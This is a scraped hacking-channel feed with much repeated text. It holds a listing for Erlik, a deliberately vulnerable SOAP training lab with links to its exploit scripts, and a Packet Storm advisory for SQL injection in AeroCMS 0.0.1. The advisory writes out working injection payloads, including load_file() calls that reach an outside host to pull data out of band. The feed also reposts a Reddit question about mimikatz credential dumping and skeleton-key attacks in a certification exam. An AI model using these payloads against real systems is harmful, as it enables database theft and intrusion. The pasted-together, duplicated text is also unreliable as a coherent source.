Erlik - Vulnerable (https://www.kitploit.com/search/label/Vulnerable) Soap Service Tested - Kali (https://www.kitploit.com/search/label/Kali) 2022.1 Description It is a vulnerable SOAP web service. It is a lab environment (https://www.kitploit.com/search/label/Lab%20Environment) created for people who want to improve themselves in the field of web penetration testing.
Features It contains the following vulnerabilities. LFISQL InjectionInformaion DisclosureCommand InejctionBrute ForceDeserialization Installation git clone https://github.com/anil-yelken/Vulnerable-Soap-Service cd Vulnerable-Soap-Service sudo pip3 install requirements.txt Usage sudo python3 vulnerable_soap.py
___________________________
@hacking_Attack
@Hacking_Video
Features It contains the following vulnerabilities. LFISQL InjectionInformaion DisclosureCommand InejctionBrute ForceDeserialization Installation git clone https://github.com/anil-yelken/Vulnerable-Soap-Service cd Vulnerable-Soap-Service sudo pip3 install requirements.txt Usage sudo python3 vulnerable_soap.py
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
Exploiting Vulnerabilities LFI Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/lfi.py
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
GitHub
Vulnerable-Soap-Service/lfi.py at main · anil-yelken/Vulnerable-Soap-Service
Erlik - Vulnerable Soap Service. Contribute to anil-yelken/Vulnerable-Soap-Service development by creating an account on GitHub.
SQL Injection Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/sqli.py
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
GitHub
Vulnerable-Soap-Service/sqli.py at main · anil-yelken/Vulnerable-Soap-Service
Erlik - Vulnerable Soap Service. Contribute to anil-yelken/Vulnerable-Soap-Service development by creating an account on GitHub.
Informaion Disclosure Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_logs_information_disclosure.py
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
GitHub
Vulnerable-Soap-Service/get_logs_information_disclosure.py at main · anil-yelken/Vulnerable-Soap-Service
Erlik - Vulnerable Soap Service. Contribute to anil-yelken/Vulnerable-Soap-Service development by creating an account on GitHub.
Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_data_information_disclosure.py
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
GitHub
Vulnerable-Soap-Service/get_data_information_disclosure.py at main · anil-yelken/Vulnerable-Soap-Service
Erlik - Vulnerable Soap Service. Contribute to anil-yelken/Vulnerable-Soap-Service development by creating an account on GitHub.
Command Injection Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/commandi.py
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
GitHub
Vulnerable-Soap-Service/commandi.py at main · anil-yelken/Vulnerable-Soap-Service
Erlik - Vulnerable Soap Service. Contribute to anil-yelken/Vulnerable-Soap-Service development by creating an account on GitHub.
Brute Force Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/brute.py
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
GitHub
Vulnerable-Soap-Service/brute.py at main · anil-yelken/Vulnerable-Soap-Service
Erlik - Vulnerable Soap Service. Contribute to anil-yelken/Vulnerable-Soap-Service development by creating an account on GitHub.
Deserialization Code: https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_socket.py https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_requests.py
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
GitHub
Vulnerable-Soap-Service/deserialization_socket.py at main · anil-yelken/Vulnerable-Soap-Service
Erlik - Vulnerable Soap Service. Contribute to anil-yelken/Vulnerable-Soap-Service development by creating an account on GitHub.
Download Vulnerable-Soap-Service (https://github.com/anil-yelken/Vulnerable-Soap-Service)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
AeroCMS 0.0.1 SQL Injection
https://3.bp.blogspot.com/-jrxagBWWEzc/WWlvX2ct0sI/AAAAAAAAIOc/SeYUuYsvaHQ6pP3Hky0NtyeOgPg6HpFpgCLcBGAs/s1600/h54.png
AeroCMS version 0.0.1 suffers from a remote SQL injection vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
AeroCMS 0.0.1 SQL Injection
https://3.bp.blogspot.com/-jrxagBWWEzc/WWlvX2ct0sI/AAAAAAAAIOc/SeYUuYsvaHQ6pP3Hky0NtyeOgPg6HpFpgCLcBGAs/s1600/h54.png
AeroCMS version 0.0.1 suffers from a remote SQL injection vulnerability.
SHA-256 |
6ad6e0c3d5d0d42b2784f9f7f7a8d4b0d53123b46c7de609a3173db9ed01f80aDownload
## Title: AeroCMS-v0.0.1 SQLi
## Author: nu11secur1ty
## Date: 08.27.2022
## Vendor: https://github.com/MegaTKC
## Software: https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi
## Description:
The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to
be vulnerable to SQL injection attacks.
The malicious user can dump-steal the database, from this CMS system
and he can use it for very malicious purposes.
STATUS: HIGH Vulnerability
[+]Payload:
```mysql
---
Parameter: author (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: author=-5045' OR 8646=8646 AND 'YeVm'='YeVm&p_id=4
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: author=admin'+(select
load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
OR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT
(ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwLN'='mwLN&p_id=4
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: author=admin'+(select
load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
AND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND 'zVTI'='zVTI&p_id=4
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: author=admin'+(select
load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
UNION ALL SELECT
NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p_id=4
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi)
## Proof and Exploit:
[href](https://streamable.com/ir9bjt)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
AeroCMS 0.0.1 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Few questions about the CRTP course/Exam.
https://www.reddit.com/r/Pentesting/comments/x0sxwe/few_questions_about_the_crtp_courseexam/
1) in trust key attack between forest thingy
lets say i dump hashes using mimikatz once from my local machine (as a local admin)
and once as domain admin, i will probably get two different krbtgt hashes, the one from the DA is the one used in the attack right ? 2) some times the lecturer uses dcorp-dc.dollarcorp.moneycorp.local and sometimes just dcorp-dc whats the difference between the two ? 3) lets say im in the exam and i escalate privs, which mimikatz command do i go for ?
Skeleton key attack, DSRM attacks, etc each has its own command
is there like a vanilla mimikatz i should go for once i escalate privs ?
if the answer is to do more enumeration, most attacks discussed in the course don't exactly tell you when to execute this attack after the enum steps, basically they dont tell you “when you see this in your enumeration results you should go for this attack” so how should i know ? submitted by /u/watermelonSoundsNice (https://www.reddit.com/user/watermelonSoundsNice)
[link] (https://www.reddit.com/r/Pentesting/comments/x0sxwe/few_questions_about_the_crtp_courseexam/) [comments] (https://www.reddit.com/r/Pentesting/comments/x0sxwe/few_questions_about_the_crtp_courseexam/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/x0sxwe/few_questions_about_the_crtp_courseexam/
1) in trust key attack between forest thingy
lets say i dump hashes using mimikatz once from my local machine (as a local admin)
and once as domain admin, i will probably get two different krbtgt hashes, the one from the DA is the one used in the attack right ? 2) some times the lecturer uses dcorp-dc.dollarcorp.moneycorp.local and sometimes just dcorp-dc whats the difference between the two ? 3) lets say im in the exam and i escalate privs, which mimikatz command do i go for ?
Skeleton key attack, DSRM attacks, etc each has its own command
is there like a vanilla mimikatz i should go for once i escalate privs ?
if the answer is to do more enumeration, most attacks discussed in the course don't exactly tell you when to execute this attack after the enum steps, basically they dont tell you “when you see this in your enumeration results you should go for this attack” so how should i know ? submitted by /u/watermelonSoundsNice (https://www.reddit.com/user/watermelonSoundsNice)
[link] (https://www.reddit.com/r/Pentesting/comments/x0sxwe/few_questions_about_the_crtp_courseexam/) [comments] (https://www.reddit.com/r/Pentesting/comments/x0sxwe/few_questions_about_the_crtp_courseexam/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Few questions about the CRTP course/Exam.
1) in trust key attack between forest thingy lets say i dump hashes using mimikatz once from my local machine (as a local admin) and once as ...